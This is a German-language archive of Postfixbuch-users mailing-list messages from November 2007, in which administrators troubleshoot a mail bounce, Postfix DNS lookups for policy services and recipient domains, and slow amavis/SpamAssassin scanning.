<018c01c82531$780fdd70$02d2b40a@EDVPC02> References: <018c01c82531$780fdd70$02d2b40a@EDVPC02> Message-ID: <20071112173149.GP7087@mail.incertum.net> Das Folgende gilt nur, wenn es sich bei chello.at und inode.at um eigenständige Unternehmen handeln sollte: * Jörg Reißlein wrote: > host 213.46.255.2 [213.46.255.2]: 553 Authentication is required to send > mail as Der meckernde Server ist ein Mailgate von chello.at. Der Inhaber des ursprgl. inode.at-Postfaches hat offensichtlich eine Weiterleitung an einen Account bei chello.at geschaltet, und diese schlägt, aus welchen Gründen auch immer fehl. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #227: Benutzerdokumentation - Alte Kodelistings sauber geheftet. (Manfred Worm Schäfer) From ml at awinkelmann.de Mon Nov 12 18:39:30 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Mon, 12 Nov 2007 18:39:30 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Postfix_Namensaufl=F6sung?= In-Reply-To: <47385ED2.8040003@reba-eno.de> References: <47385ED2.8040003@reba-eno.de> Message-ID: <200711121839.30499.ml@awinkelmann.de> On Montag, 12. November 2007, Peter Bauernfeind wrote: > ich habe Schwierigkeiten meinen Netzinternen DNS zu verwenden. Oder > anders gesagt wie unterscheidet sich der interne vom externen DNS? Ich > finde einfach den Fehler nicht. Ich sende zweimal eine Mail von meinem > GMX-Account, zuerst wird der interne DNS verwendet und die Mail wird > wegen "Recipient address rejected: Domain not found" abgelehnt. Dann > habe ich einen externen DNS verwendet und die Mail wird eingeliefert. > Mail inerhalb des internen Netzes werden mit beiden DNS eingeliefert. > > #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#* > > reba-dsl:/var/log# dig mail.gmx.de > reba-dsl:/etc/resolvconf/run# dig mx mail.gmx.de > reba-dsl:/etc/resolvconf/run# dig any mail.gmx.de > Nov 9 20:30:56 reba-dsl postfix/smtpd[2712]: connect from > mail.gmx.net[213.165.64.20] > Nov 9 20:30:56 reba-dsl postfix/smtpd[2712]: NOQUEUE: reject: RCPT from > mail.gmx.net[213.165.64.20]: 450 4.1.2 > : Recipient address rejected: Domain > not found; from= > to= proto=SMTP helo= Er findet die Empfänger-Domain (reba-eno.example) nicht, wieso machst Du DNS-Abfragen nach *.gmx.de ? > Nov 9 20:30:56 reba-dsl postfix/smtpd[2712]: disconnect from > mail.gmx.net[213.165.64.20] -- Andreas From postfixbuch-users at japantest.homelinux.com Mon Nov 12 19:08:32 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Mon, 12 Nov 2007 19:08:32 +0100 Subject: [Postfixbuch-users] amavis Performance zur zeit mieserabel In-Reply-To: <4738764D.1020506@rprengel.de> References: <4738764D.1020506@rprengel.de> Message-ID: <473896A0.1040602@japantest.homelinux.com> Ralf Prengel wrote: > Hallo, > > ich habe hier eine tagesaktuelle Suse 10.1 Installation in der jede Mail > zwischen 20 und 30 Sekunden für die Test benötigt die amavis auslöst. > DNS-Probleme dürften ausscheiden da ich einen eigenen Server nutze und > dessen Logfiles auch unauffällig sind. > Sobald ich aus der master.cf testweise alles zum Thema amavis > auskonfiguriere sehe ich im fetchmail-Logfile das die Mails in einem > Bruchteil der Zeit durchlaufen. Es ist also ein lokales Problem. > Im nächsten Schritt habe ich testweise die Mailscanner abgeschaltet und > habe die Durchlaufzeit zumindestens halbiert. Setze den Loglevel von Amavisd-new hoch und stelle zuerst einmal fest, an welcher Stelle (Virenscan oder Spamscan) die Zeit hauptsächlich gefressen wird. Wenn du z.B. noch alte RBLs in Spamassassin aufrufst, die in einem Timeout enden, dann würde mich das nicht wundern. Welcher Stand ist SA und Amavisd-new? -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From j.reisslein at schmitt-aufzuege.de Mon Nov 12 21:11:14 2007 From: j.reisslein at schmitt-aufzuege.de (=?ISO-8859-1?Q?J=F6rg_Rei=DFlein?=) Date: Mon, 12 Nov 2007 21:11:14 +0100 Subject: [Postfixbuch-users] SMTP 553 In-Reply-To: <002901c8254d$57afaee0$0565a8c0@uwe> References: <018c01c82531$780fdd70$02d2b40a@EDVPC02> <002901c8254d$57afaee0$0565a8c0@uwe> Message-ID: <4738B362.9010402@schmitt-aufzuege.de> Naja der Bounce kam ja nicht von unserem Server sondern von inode.at zurück also hab ich da auch keine Logfiles zu... mfg.. Uwe Driessen schrieb: > Jörg Reißlein schrieb: > > nimm mal nur text als Format HTML liest sich sche.... > > >> Nov 12 14:26:09 mail postfix/smtpd[22334]: 814D2D466B: >> client=known[10.221.210.11], sasl_method=LOGIN, >> sasl_username=irschenhofer >> > > hat sich angemeldet > > >> Nov 12 14:26:10 mail postfix/cleanup[27725]: 814D2D466B: >> message-id=&!AAAAAAAAAAAYAAAAAAAAALC3QmFghzJEvLD1ZXwCzIPCgAA >> > AEAAAAFdVBnDqk/VMifI20+Cr3V0BAAAAAA=schmitt-aufzuege.at> > > > mail wurde angenommen > > >> Nov 12 14:26:10 mail postfix/qmgr[4956]: 814D2D466B: >> from=.kirschenhofer at schmitt-aufzuege.at>, size%230, >> nrcpt=(queue active) >> >> Nov 12 14:26:17 mail postfix/smtp[28456]: 814D2D466B: >> to=andra.horak at inode.at>, relay7.0.0.1[127.0.0.1], >> delay= status=sent (250 2.6.0 Ok, id(188-10, from >> MTA([127.0.0.1]:10025): 250 Ok: queued as 81650DC826) >> > > durch die internen Filter durch > > >> Nov 12 14:26:17 mail postfix/qmgr[4956]: 814D2D466B: removed >> >> mail:~ # mailgrep.pl -q -s 81650DC826 >> >> postfix/.*(81650DC826) >> >> Nov 12 14:26:17 mail postfix/smtpd[27406]: 81650DC826: >> client=calhost[127.0.0.1] >> >> Nov 12 14:26:17 mail postfix/cleanup[27725]: 81650DC826: >> message-id=&!AAAAAAAAAAAYAAAAAAAAALC3QmFghzJEvLD1ZXwCzIPCgAA >> > AEAAAAFdVBnDqk/VMifI20+Cr3V0BAAAAAA=schmitt-aufzuege.at> > >> Nov 12 14:26:17 mail postfix/qmgr[4956]: 81650DC826: >> from=.kirschenhofer at schmitt-aufzuege.at>, size%744, >> nrcpt=(queue active) >> >> Nov 12 14:26:17 mail postfix/smtp[28456]: 814D2D466B: >> to=andra.horak at inode.at>, relay7.0.0.1[127.0.0.1], >> delay= status=sent (250 2.6.0 Ok, id(188-10, from >> MTA([127.0.0.1]:10025): 250 Ok: queued as 81650DC826) >> >> Nov 12 14:26:27 mail postfix/smtp[28469]: 81650DC826: >> to=andra.horak at inode.at>, >> relay=mail.inode.at[213.229.60.101], delay, status=sent >> (250 OK id=rZJ0-0000WO-3y) >> > > hier ist eine Auslieferung zu sehen > > >> Nov 12 14:26:27 mail postfix/qmgr[4956]: 81650DC826: removed >> >> > > aber da fehlt so ein bischen was wirst nicht umhin kommen von hand die zusammenhängenden > Log Zeilen nochmal zusammen zu suchen. > aus den Einträgen geht eigentlich nur hervor das versendet wurde aber nicht was da Bounced > oder rejecte. > sollte da evtl. ein automatischer Zustellbericht oder Lesebestätigung angefordert worden > sein??? > > > > Mit freundlichen Grüßen > > Drießen > > -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From stefan at webetc.de Mon Nov 12 21:34:55 2007 From: stefan at webetc.de (stefan at webetc.de) Date: Mon, 12 Nov 2007 21:34:55 +0100 (CET) Subject: [Postfixbuch-users] check_policy_service + DNS Message-ID: <62900.85.180.221.20.1194899695.squirrel@85.180.221.20> Hallo zusammen, eine Frage der Namensauflösung in Postfix. Sowas kennen wir ja alle: check_policy_service = inet:127.0.0.1:2501 Funktioniert prima. Mit einer Ip-Adresse geht das auch: check_policy_service = inet:88.88.88.88:2501 Wenn ich nun einen Hostnamen benutze: check_policy_service inet:greymail.domain.tld:2501 dann bekomme ich einen Fehler: Nov 12 21:12:13 mailserver postfix/smtpd[709]: fatal: host not found: greymail.domain.tld Auch ein setzen des Hostnamen in eckige Klammern bringt nichts. Kann es sein, dass an dieser stelle keine Namensauflösung funktioniert? Oder mache ich was falsch? Gruss Stefan From r.felber at ek-muc.de Mon Nov 12 22:08:55 2007 From: r.felber at ek-muc.de (Robert Felber) Date: Mon, 12 Nov 2007 22:08:55 +0100 Subject: [Postfixbuch-users] check_policy_service + DNS In-Reply-To: <62900.85.180.221.20.1194899695.squirrel@85.180.221.20> References: <62900.85.180.221.20.1194899695.squirrel@85.180.221.20> Message-ID: <20071112210855.GA97888@robtone.ek-muc.de> On Mon, Nov 12, 2007 at 09:34:32PM +0100, stefan at webetc.de wrote: > Hallo zusammen, > > eine Frage der Namensauflösung in Postfix. > > Sowas kennen wir ja alle: > check_policy_service = inet:127.0.0.1:2501 > Funktioniert prima. > > Mit einer Ip-Adresse geht das auch: > check_policy_service = inet:88.88.88.88:2501 > > Wenn ich nun einen Hostnamen benutze: > check_policy_service inet:greymail.domain.tld:2501 > dann bekomme ich einen Fehler: > Nov 12 21:12:13 mailserver postfix/smtpd[709]: fatal: host not found: > greymail.domain.tld smtpd im chroot? Kennen die NS aus dem evtl. chroot den NS fuer domain.tld? -- Robert Felber (PGP: 896CF30B) Munich, Germany From stefan at webetc.de Mon Nov 12 22:23:08 2007 From: stefan at webetc.de (stefan at webetc.de) Date: Mon, 12 Nov 2007 22:23:08 +0100 (CET) Subject: [Postfixbuch-users] check_policy_service + DNS In-Reply-To: <20071112210855.GA97888@robtone.ek-muc.de> References: <62900.85.180.221.20.1194899695.squirrel@85.180.221.20> <20071112210855.GA97888@robtone.ek-muc.de> Message-ID: <61074.85.180.221.20.1194902588.squirrel@85.180.221.20> >> Sowas kennen wir ja alle: >> check_policy_service = inet:127.0.0.1:2501 >> Funktioniert prima. >> >> Mit einer Ip-Adresse geht das auch: >> check_policy_service = inet:88.88.88.88:2501 >> >> Wenn ich nun einen Hostnamen benutze: >> check_policy_service inet:greymail.domain.tld:2501 >> dann bekomme ich einen Fehler: >> Nov 12 21:12:13 mailserver postfix/smtpd[709]: fatal: host not found: >> greymail.domain.tld > > > smtpd im chroot? Kennen die NS aus dem evtl. chroot den NS fuer > domain.tld? Nein, kein chroot. Die Auflösung des Namen funktioniert von dem Host aus. Gruss Stefan From r.felber at ek-muc.de Mon Nov 12 22:49:49 2007 From: r.felber at ek-muc.de (Robert Felber) Date: Mon, 12 Nov 2007 22:49:49 +0100 Subject: [Postfixbuch-users] check_policy_service + DNS In-Reply-To: <61074.85.180.221.20.1194902588.squirrel@85.180.221.20> References: <62900.85.180.221.20.1194899695.squirrel@85.180.221.20> <20071112210855.GA97888@robtone.ek-muc.de> <61074.85.180.221.20.1194902588.squirrel@85.180.221.20> Message-ID: <20071112214949.GA4116@robtone.ek-muc.de> On Mon, Nov 12, 2007 at 10:22:45PM +0100, stefan at webetc.de wrote: > >> Sowas kennen wir ja alle: > >> check_policy_service = inet:127.0.0.1:2501 > >> Funktioniert prima. > >> > >> Mit einer Ip-Adresse geht das auch: > >> check_policy_service = inet:88.88.88.88:2501 > >> > >> Wenn ich nun einen Hostnamen benutze: > >> check_policy_service inet:greymail.domain.tld:2501 > >> dann bekomme ich einen Fehler: > >> Nov 12 21:12:13 mailserver postfix/smtpd[709]: fatal: host not found: > >> greymail.domain.tld > > > > > > smtpd im chroot? Kennen die NS aus dem evtl. chroot den NS fuer > > domain.tld? > > > Nein, kein chroot. > Die Auflösung des Namen funktioniert von dem Host aus. Dann wuerde ich http://www.postfix.org/DEBUG_README.html durchgehen. (verbosity erhoehen hilft leider nicht viel) Bzw auch ein tpcdump -s0 -X fuer port 53. (P.s.: hier funktionierts) -- Robert Felber (PGP: 896CF30B) Munich, Germany From stefan at webetc.de Mon Nov 12 22:55:36 2007 From: stefan at webetc.de (stefan at webetc.de) Date: Mon, 12 Nov 2007 22:55:36 +0100 (CET) Subject: [Postfixbuch-users] check_policy_service + DNS In-Reply-To: <20071112214949.GA4116@robtone.ek-muc.de> References: <62900.85.180.221.20.1194899695.squirrel@85.180.221.20> <20071112210855.GA97888@robtone.ek-muc.de> <61074.85.180.221.20.1194902588.squirrel@85.180.221.20> <20071112214949.GA4116@robtone.ek-muc.de> Message-ID: <62640.85.180.221.20.1194904536.squirrel@85.180.221.20> >> >> Mit einer Ip-Adresse geht das auch: >> >> check_policy_service = inet:88.88.88.88:2501 >> >> >> >> Wenn ich nun einen Hostnamen benutze: >> >> check_policy_service inet:greymail.domain.tld:2501 >> >> dann bekomme ich einen Fehler: >> >> Nov 12 21:12:13 mailserver postfix/smtpd[709]: fatal: host not found: >> >> greymail.domain.tld >> > >> > smtpd im chroot? Kennen die NS aus dem evtl. chroot den NS fuer >> > domain.tld? >> >> Nein, kein chroot. >> Die Auflösung des Namen funktioniert von dem Host aus. > > Dann wuerde ich http://www.postfix.org/DEBUG_README.html > durchgehen. > (verbosity erhoehen hilft leider nicht viel) > Bzw auch ein tpcdump -s0 -X fuer port 53. Seufz.... > (P.s.: hier funktionierts) so? check_policy_service inet:greymail.domain.tld:2501 Vielleicht liegts daran? --> Postfix version 2.1.5 From christian at bricart.de Mon Nov 12 23:20:28 2007 From: christian at bricart.de (Christian Bricart) Date: Mon, 12 Nov 2007 23:20:28 +0100 Subject: [Postfixbuch-users] amavis Performance zur zeit mieserabel In-Reply-To: <4738764D.1020506@rprengel.de> References: <4738764D.1020506@rprengel.de> Message-ID: <4738D1AC.1090302@bricart.de> Ralf Prengel wrote: > Hallo, > > ich habe hier eine tagesaktuelle Suse 10.1 Installation in der jede Mail > zwischen 20 und 30 Sekunden für die Test benötigt die amavis auslöst. > DNS-Probleme dürften ausscheiden da ich einen eigenen Server nutze und > dessen Logfiles auch unauffällig sind. Die Durchlaufzeiten kommen mir bekannt vor... hatte ich vor ca. zwei Wochen auch... Wie alt ist denn die Installation? Ist die evtl. schon älter? Wieviel Mails pro Tag gehen ca. da durch..? Der Übeltäter bei mir war die AWL (AutoWhiteList) von Spamassassin. Die Datei war bei mir über die Zeit auf knapp 350MB angewachsen... Und solche Grössen sollte man einfach nicht mehr als Berkley-DB haben.. ;-) INSERTs und UPDATEs auf diese Pseudo-Datenbank fressen einfach zu viel (Platten-/CPU-)Performance. Ich hab die AWL-Datei dann einfach gelöscht (die korrigiert ja eh nur die Ergebniss, falls sie zu schlecht sein sollten) und schon hatte ich wieder Durchlaufzeiten von max. 0.5 Sekunden pro Mail... Zusätzlich könntest du (genügend RAM im Server vorausgesetzt) überlegen, deinen Temporär-Bereich von AMaViS in eine Ramdisk/tmpfs zu legen (http://www.arschkrebs.de/postfix/amavisd_tmpfs.shtml). Christian From postfix-buch.ml at michawinter.de Mon Nov 12 23:30:12 2007 From: postfix-buch.ml at michawinter.de (Michael Winter) Date: Mon, 12 Nov 2007 23:30:12 +0100 Subject: [Postfixbuch-users] check_policy_service + DNS In-Reply-To: <61074.85.180.221.20.1194902588.squirrel@85.180.221.20> References: <62900.85.180.221.20.1194899695.squirrel@85.180.221.20> <20071112210855.GA97888@robtone.ek-muc.de> <61074.85.180.221.20.1194902588.squirrel@85.180.221.20> Message-ID: <4738D3F4.2020802@michawinter.de> stefan at webetc.de wrote: >>> Wenn ich nun einen Hostnamen benutze: >>> check_policy_service inet:greymail.domain.tld:2501 >>> dann bekomme ich einen Fehler: >>> Nov 12 21:12:13 mailserver postfix/smtpd[709]: fatal: host not found: >>> greymail.domain.tld > Die Auflösung des Namen funktioniert von dem Host aus. Dumme Idee: s/grey/gray/ Könntjasein. -Michael From r.felber at ek-muc.de Tue Nov 13 07:20:43 2007 From: r.felber at ek-muc.de (Robert Felber) Date: Tue, 13 Nov 2007 07:20:43 +0100 Subject: [Postfixbuch-users] check_policy_service + DNS In-Reply-To: <62640.85.180.221.20.1194904536.squirrel@85.180.221.20> References: <62900.85.180.221.20.1194899695.squirrel@85.180.221.20> <20071112210855.GA97888@robtone.ek-muc.de> <61074.85.180.221.20.1194902588.squirrel@85.180.221.20> <20071112214949.GA4116@robtone.ek-muc.de> <62640.85.180.221.20.1194904536.squirrel@85.180.221.20> Message-ID: <20071113062043.GA97425@robtone.ek-muc.de> On Mon, Nov 12, 2007 at 10:55:13PM +0100, stefan at webetc.de wrote: > >> >> Mit einer Ip-Adresse geht das auch: > >> >> check_policy_service = inet:88.88.88.88:2501 > >> >> > >> >> Wenn ich nun einen Hostnamen benutze: > >> >> check_policy_service inet:greymail.domain.tld:2501 > >> >> dann bekomme ich einen Fehler: > >> >> Nov 12 21:12:13 mailserver postfix/smtpd[709]: fatal: host not found: > >> >> greymail.domain.tld > >> > > >> > smtpd im chroot? Kennen die NS aus dem evtl. chroot den NS fuer > >> > domain.tld? > >> > >> Nein, kein chroot. > >> Die Auflösung des Namen funktioniert von dem Host aus. > > > > Dann wuerde ich http://www.postfix.org/DEBUG_README.html > > durchgehen. > > (verbosity erhoehen hilft leider nicht viel) > > Bzw auch ein tpcdump -s0 -X fuer port 53. > > Seufz.... > > > (P.s.: hier funktionierts) > > so? > check_policy_service inet:greymail.domain.tld:2501 > > > Vielleicht liegts daran? --> Postfix version 2.1.5 > Entzieht sich meiner Kentnis. Aber da er ja 'host not found' bei dir sagt, gehe ich davon aus, dass er lookups macht. Falsche Argumente zu connect(2) (oder was auch immer da benutzt wird), duerfte zu etwas anderem als 'host ot found fuehren'. -- Robert Felber (PGP: 896CF30B) Munich, Germany From peter.bauernfeind at reba-eno.de Tue Nov 13 10:00:52 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Tue, 13 Nov 2007 10:00:52 +0100 Subject: [Postfixbuch-users] check_policy_service + DNS In-Reply-To: <62640.85.180.221.20.1194904536.squirrel@85.180.221.20> References: <62900.85.180.221.20.1194899695.squirrel@85.180.221.20> <20071112210855.GA97888@robtone.ek-muc.de> <61074.85.180.221.20.1194902588.squirrel@85.180.221.20> <20071112214949.GA4116@robtone.ek-muc.de> <62640.85.180.221.20.1194904536.squirrel@85.180.221.20> Message-ID: <473967C4.4090201@reba-eno.de> stefan at webetc.de schrieb: > Vielleicht liegts daran? --> Postfix version 2.1.5 > > Da ich zur Zeit auch noch ein ungelöstes Rätsel habe, welchen DNS fragst du ab? Einen internen oder einen externen. Wenn intern welches Programm stellt den DNS? Mit freundlichem Gruß Peter Bauernfeind From peter.bauernfeind at reba-eno.de Tue Nov 13 10:25:19 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Tue, 13 Nov 2007 10:25:19 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Postfix_Namensaufl=F6sung?= In-Reply-To: <200711121839.30499.ml@awinkelmann.de> References: <47385ED2.8040003@reba-eno.de> <200711121839.30499.ml@awinkelmann.de> Message-ID: <47396D7F.4050702@reba-eno.de> Andreas Winkelmann schrieb: >> Nov 9 20:30:56 reba-dsl postfix/smtpd[2712]: connect from >> mail.gmx.net[213.165.64.20] >> Nov 9 20:30:56 reba-dsl postfix/smtpd[2712]: NOQUEUE: reject: RCPT from >> mail.gmx.net[213.165.64.20]: 450 4.1.2 >> : Recipient address rejected: Domain >> not found; from= >> to= proto=SMTP helo= >> >> Nov 9 20:30:56 reba-dsl postfix/smtpd[2712]: disconnect from >> mail.gmx.net[213.165.64.20] >> > > > Er findet die Empfänger-Domain (reba-eno.example) nicht Sicher? Entschuldigung, ich dachte es wäre ersichtlich, daß ich ".de" gegen ".example" getauscht habe. > wieso machst Du DNS-Abfragen nach *.gmx.de Weil, wie ich schon schrieb, der interne Mailtransport im lokalen Netz funktioniert. D.h. von einem dritten Rechner zu Reba-Dsl und dann weiter zu [192.168.50.75] funktionuiert. Ich habe in der ganzen Konfiguration nur in den resolv.conf von internen auf externen DNS umgestellt. Das Hauptproblem bei mir ist, wo kann ich nachschauen, was Postfix abfragt, was es dann geliefert bekommt und wie Postfix damit umgeht. Mit freundlichem Gruß Peter Bauernfeind From marc.samendinger at sp-online.de Tue Nov 13 11:39:37 2007 From: marc.samendinger at sp-online.de (Marc Samendinger) Date: Tue, 13 Nov 2007 11:39:37 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Postfix_Namensaufl=F6sung?= In-Reply-To: <47396D7F.4050702@reba-eno.de> References: <47385ED2.8040003@reba-eno.de> <200711121839.30499.ml@awinkelmann.de> <47396D7F.4050702@reba-eno.de> Message-ID: <20071113103937.GA10990@barracuda.sp-online.de> On Tue, Nov 13, 2007 at 10:25:19AM +0100, Peter Bauernfeind wrote: > Andreas Winkelmann schrieb: > >> : Recipient address rejected: Domain > >> not found; from= > > > > > > Er findet die Empfänger-Domain (reba-eno.example) nicht > > Sicher? Entschuldigung, ich dachte es wäre ersichtlich, daß ich ".de" > gegen ".example" getauscht habe. Das mag ja sein. Dem log file nach zu urteilen kann aber der Empfänger nicht aufgelöst werden: > >> : Recipient address rejected: > >> Domain > >> not found; from= Der Empfänger ist reba-eno.example oder was auch immer vor der Anwendung deiner Verschleierungstechnik dort stand. > > wieso machst Du DNS-Abfragen nach *.gmx.de > > Weil, wie ich schon schrieb, der interne Mailtransport im lokalen Netz > funktioniert. > zu [192.168.50.75] funktionuiert. Ich habe in der ganzen Konfiguration > nur in den resolv.conf von internen auf externen DNS umgestellt. Das Problem ist aber nicht das Auflösen der gmx Adressen sondern deiner eigenen. Der externe DNS kennt deine eigene Domäne nicht. DNS Problem nicht Postfix. > Mit freundlichem Gruß > Peter Bauernfeind Gruß Marc From christian at bricart.de Tue Nov 13 11:43:02 2007 From: christian at bricart.de (Christian Bricart) Date: Tue, 13 Nov 2007 11:43:02 +0100 (CET) Subject: [Postfixbuch-users] =?iso-8859-1?q?Postfix_Namensaufl=F6sung?= In-Reply-To: <47396D7F.4050702@reba-eno.de> References: <47385ED2.8040003@reba-eno.de> <200711121839.30499.ml@awinkelmann.de> <47396D7F.4050702@reba-eno.de> Message-ID: <46029.80.87.162.117.1194950582.squirrel@aachalon.de> Hi Peter, (Entschuldigung, wenn ich hier irgendwo den Thread hijacke - ich find' grade keinen Punkt zum korrekt einklinken ;-) ) Wo ich gerade Hostnamen mit "*dsl*" lese - ich hab heute schon zwei lokale Nameserver an (Telekom-)DSLs umkonfigurieren müssen, weil dort auch keine Auflösung mehr funktioniert hat.. Diese Rechner übernahmen nicht die DNS-Server-IPs, die beim ppp-connect vom Provider kommen, sondern haben in ihrer /etc/resolv.conf den lokalen DNS eingetragen, welcher wiederum beim Aufsetzen des Rechners einmal die (damals) geltenden Telekom-DNS-Server als Forwarder eingetragen hatte. Nun meldet sich seit gestern(?) auf der alten Telekom-DNS-IP weiterhin ein DNS-Server, der allerdings für _alle_ Anfragen (und zwar nur A - nicht MX) eine IP eines Telekom-Webservers rausgibt, auf dem ein Hinweistext über die Umstellung der DNS-Server steht... Hast du evtl. eine ähnliche Konfiguration, auf die das passen könnte..? Christian From ralf.prengel at rprengel.de Tue Nov 13 12:56:21 2007 From: ralf.prengel at rprengel.de (rprengel) Date: Tue, 13 Nov 2007 12:56:21 +0100 Subject: [Postfixbuch-users] amavis Performance zur zeit mieserabel In-Reply-To: <4738D1AC.1090302@bricart.de> References: <4738764D.1020506@rprengel.de> <4738D1AC.1090302@bricart.de> Message-ID: <473990E5.1080202@rprengel.de> Christian Bricart wrote: Mails pro Tag gehen ca. da durch..? > > Der Übeltäter bei mir war die AWL (AutoWhiteList) von Spamassassin. Die > Datei war bei mir über die Zeit auf knapp 350MB angewachsen... Und > solche Grössen sollte man einfach nicht mehr als Berkley-DB haben.. ;-) > INSERTs und UPDATEs auf diese Pseudo-Datenbank fressen einfach zu viel > (Platten-/CPU-)Performance. > Ich hab die AWL-Datei dann einfach gelöscht (die korrigiert ja eh nur > die Ergebniss, falls sie zu schlecht sein sollten) und schon hatte ich > wieder Durchlaufzeiten von max. 0.5 Sekunden pro Mail... Ich fürchte das wird es nicht sein. -rw------- 1 vscan vscan 21M Nov 13 09:44 auto-whitelist -rw------- 1 vscan vscan 23K Nov 13 09:44 bayes_journal -rw------- 1 vscan vscan 40M Nov 13 09:53 bayes_seen -rw------- 1 vscan vscan 5.2M Nov 13 09:44 bayes_toks Danke für den Tip From peter.bauernfeind at reba-eno.de Tue Nov 13 13:08:08 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Tue, 13 Nov 2007 13:08:08 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Postfix_Namensaufl=F6sung?= In-Reply-To: <20071113103937.GA10990@barracuda.sp-online.de> References: <47385ED2.8040003@reba-eno.de> <200711121839.30499.ml@awinkelmann.de> <47396D7F.4050702@reba-eno.de> <20071113103937.GA10990@barracuda.sp-online.de> Message-ID: <473993A8.5030202@reba-eno.de> Marc Samendinger schrieb: >>> Er findet die Empfänger-Domain (reba-eno.example) nicht >>> Ich habe die zwei Fehler gefunden: 1) ich wollte nicht glauben was Postfix als Fehlermeldung schrieb, bzw. meinte es besser zu wissen 2) der Fehler saß vor dem Monitor. Ich gelobe, auch in tiefesten Krisen den Fehlermeldungen von Postfix zu folgen. ;-) Mit freundlichem Gruß Peter Bauernfeind From peter.bauernfeind at reba-eno.de Tue Nov 13 13:31:23 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Tue, 13 Nov 2007 13:31:23 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Postfix_Namensaufl=F6sung?= In-Reply-To: <46029.80.87.162.117.1194950582.squirrel@aachalon.de> References: <47385ED2.8040003@reba-eno.de> <200711121839.30499.ml@awinkelmann.de> <47396D7F.4050702@reba-eno.de> <46029.80.87.162.117.1194950582.squirrel@aachalon.de> Message-ID: <4739991B.9000000@reba-eno.de> Christian Bricart schrieb: > Hast du evtl. eine ähnliche Konfiguration, auf die das passen könnte..? > > Nein. Der Rechner ist weder bei der T-Online noch hat er wechselnde IP-Nummern. Welches Distribution? Was steht in /etc/ppp/ip-up.d? Gibt es dort ein resolvconf? Mit freundlichem Gruß Peter Bauernfeind From marc.samendinger at sp-online.de Tue Nov 13 13:37:37 2007 From: marc.samendinger at sp-online.de (Marc Samendinger) Date: Tue, 13 Nov 2007 13:37:37 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Postfix_Namensaufl=F6sung?= In-Reply-To: <473993A8.5030202@reba-eno.de> References: <47385ED2.8040003@reba-eno.de> <200711121839.30499.ml@awinkelmann.de> <47396D7F.4050702@reba-eno.de> <20071113103937.GA10990@barracuda.sp-online.de> <473993A8.5030202@reba-eno.de> Message-ID: <20071113123737.GB10990@barracuda.sp-online.de> On Tue, Nov 13, 2007 at 01:08:08PM +0100, Peter Bauernfeind wrote: > Marc Samendinger schrieb: > >>> Er findet die Empfänger-Domain (reba-eno.example) nicht > >>> > > Ich habe die zwei Fehler gefunden: > > 1) ich wollte nicht glauben was Postfix als Fehlermeldung schrieb, bzw. > meinte es besser zu wissen > 2) der Fehler saß vor dem Monitor. > > Ich gelobe, auch in tiefesten Krisen den Fehlermeldungen von Postfix zu > folgen. ;-) Ja es gibt zwei Dinge auf die man sich beinahe immer blind verlassen kann: 1) Fehlermeldungen von Postfix 2) Fahleranalysen/Ratschläge von Andreas > Mit freundlichem Gruß > Peter Bauernfeind ;) Marc From peter.bauernfeind at reba-eno.de Tue Nov 13 13:43:09 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Tue, 13 Nov 2007 13:43:09 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Postfix_Namensaufl=F6sung?= In-Reply-To: <20071113123737.GB10990@barracuda.sp-online.de> References: <47385ED2.8040003@reba-eno.de> <200711121839.30499.ml@awinkelmann.de> <47396D7F.4050702@reba-eno.de> <20071113103937.GA10990@barracuda.sp-online.de> <473993A8.5030202@reba-eno.de> <20071113123737.GB10990@barracuda.sp-online.de> Message-ID: <47399BDD.8030409@reba-eno.de> Marc Samendinger schrieb: > Ja es gibt zwei Dinge auf die man sich beinahe immer blind verlassen > kann: > > 1) Fehlermeldungen von Postfix > 2) Fahleranalysen/Ratschläge von Andreas > > Was mich am Meisten verwirrt hat war, daß interne Mails ausgeliefert wurden. Nachdem ich mir dann nochmal die postconf -n angesehen hatte war es klar: Die internen dürfen alles, permit_mynetworks. Mit freundlichem Gruß Peter Bauernfeind From ralf.prengel at rprengel.de Tue Nov 13 14:49:31 2007 From: ralf.prengel at rprengel.de (rprengel) Date: Tue, 13 Nov 2007 14:49:31 +0100 Subject: [Postfixbuch-users] amavis Performance zur zeit mieserabel In-Reply-To: <473896A0.1040602@japantest.homelinux.com> References: <4738764D.1020506@rprengel.de> <473896A0.1040602@japantest.homelinux.com> Message-ID: <4739AB6B.5010606@rprengel.de> Sandy Drobic wrote: abe die Durchlaufzeit zumindestens halbiert. > > Setze den Loglevel von Amavisd-new hoch und stelle zuerst einmal fest, an > welcher Stelle (Virenscan oder Spamscan) die Zeit hauptsächlich gefressen > wird. Wenn du z.B. noch alte RBLs in Spamassassin aufrufst, die in einem > Timeout enden, dann würde mich das nicht wundern. > > Welcher Stand ist SA und Amavisd-new? > amavisd-new-2.3.3 spamassasin-3-1.8-9-2 Wie kann ich erkennen welche RBL ich nutze? Ausserdem direkt die Frage ob und wie man die Spamdatenbank ggf. mal optimieren kann. Vielleicht ist da ja auch was schief und bremst aus. Parallel dazu habe ich das virtuelle System in dem der Server läuft mal gewartet. Platten mittels VMware defragmentiert und von IDE auf SCSI migriert. Das hat auch schon einiges gebracht. Es sieht so aus als gäbe es nicht eine entscheidende Ursache sondern eine Summe diverser "Pflegemängel". Gruß From driessen at fblan.de Tue Nov 13 15:29:10 2007 From: driessen at fblan.de (Uwe Driessen) Date: Tue, 13 Nov 2007 15:29:10 +0100 Subject: [Postfixbuch-users] amavis Performance zur zeit mieserabel In-Reply-To: 